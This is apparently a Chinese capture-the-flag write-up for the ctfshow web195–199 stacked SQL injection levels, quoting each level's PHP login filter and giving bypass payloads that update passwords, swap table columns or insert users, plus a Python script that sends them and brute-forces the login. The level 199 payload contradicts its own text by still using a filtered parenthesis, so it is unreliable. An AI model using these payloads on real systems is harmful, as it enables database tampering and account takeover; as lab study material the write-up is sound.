开刷
web195
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| $sql = "select pass from ctfshow_user where username = {$username};";
if(!is_numeric($password)){ $ret['msg']='密码只能为数字'; die(json_encode($ret)); }
if($row['pass']==$password){ $ret['msg']='登陆成功'; }
if(preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|\'|\"|select|union|or|and|\x26|\x7c|file|into/i', $username)){ $ret['msg']='用户名非法'; die(json_encode($ret)); }
if($row[0]==$password){ $ret['msg']="登陆成功 flag is $flag"; }
|
堆叠注入最大的提示就是没过滤分号;
直接把密码改了,0;update
ctfshow_userset
pass=0
双击登录即可成功!
web196
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| $sql = "select pass from ctfshow_user where username = {$username};";
if(preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|\'|\"|select|union|or|and|\x26|\x7c|file|into/i', $username)){ $ret['msg']='用户名非法'; die(json_encode($ret)); }
if(strlen($username)>16){ $ret['msg']='用户名不能超过16个字符'; die(json_encode($ret)); }
if($row[0]==$password){ $ret['msg']="登陆成功 flag is $flag"; }
|
有过滤的数字型注入,给出的过滤正则表达式变得不可信,明明有 select 但还是可以用的,利用堆叠注入绕过密码。
payload: 1;select(1)
密码 1
web197
1 2 3 4 5 6 7 8 9 10
| if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set//i', $username)){ $ret['msg']='用户名非法'; die(json_encode($ret)); }
if($row[0]==$password){ $ret['msg']="登陆成功 flag is $flag"; } 这是后端的返回逻辑
|
还是只要登录成功就可获得flag
,这里可以对表的结构进行修改,要么将字段名互换,要么添加新用户都是可以的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42
| from colorama import Fore, Back, Style
from colorama import init init(autoreset=True)
import requests
url = "http://5fc3792d-7987-4020-bd67-439f5125d14c.challenge.ctf.show/api/"
def alter_table(): data = { "username": "0;alter table ctfshow_user change column pass tmp varchar(255);alter table ctfshow_user change " "column id pass varchar(255);alter table ctfshow_user change column tmp id varchar(255)", "password": 1 } _ = requests.post(url, data=data)
success_flag = "\\u767b\\u9646\\u6210\\u529f"
def brute_force_admin(): for i in range(300): data = { "username": f"0", "password": {i} } response = requests.post(url, data=data) if success_flag in response.text: print(Fore.RED+f"[!] password: {i}") print(Fore.GREEN+f"[*] msg: {response.text}") return
if __name__ == "__main__": print("[*] change column id to pass") alter_table() print("[*] brute force admin password") brute_force_admin()
|
添加新用户
1
| 0' insert ctfshow_user(`username`,`pass`) value(1,2)
|
构造满足要求的语句
1 2
| username: 1;show tables pass: ctfshow_user
|
199
1 2 3 4 5 6 7 8 9 10
|
if('/\*|\#|\-|\x23|\'|\"|union|or|and|\x26|\x7c|file|into|select|update|set|create|drop|\(/i', $username)){ $ret['msg']='用户名非法'; die(json_encode($ret)); }
if($row[0]==$password){ $ret['msg']="登陆成功 flag is $flag"; }
|
过滤了(
,无法用varchar(255)
,我们选择用text
平替一下即可
1 2
| 0;alter table ctfshow_user change column pass tmp varchar(255);alter table ctfshow_user change " "column id pass varchar(255);alter table ctfshow_user change column tmp id varchar(255)
|
堆叠注入结束了喔!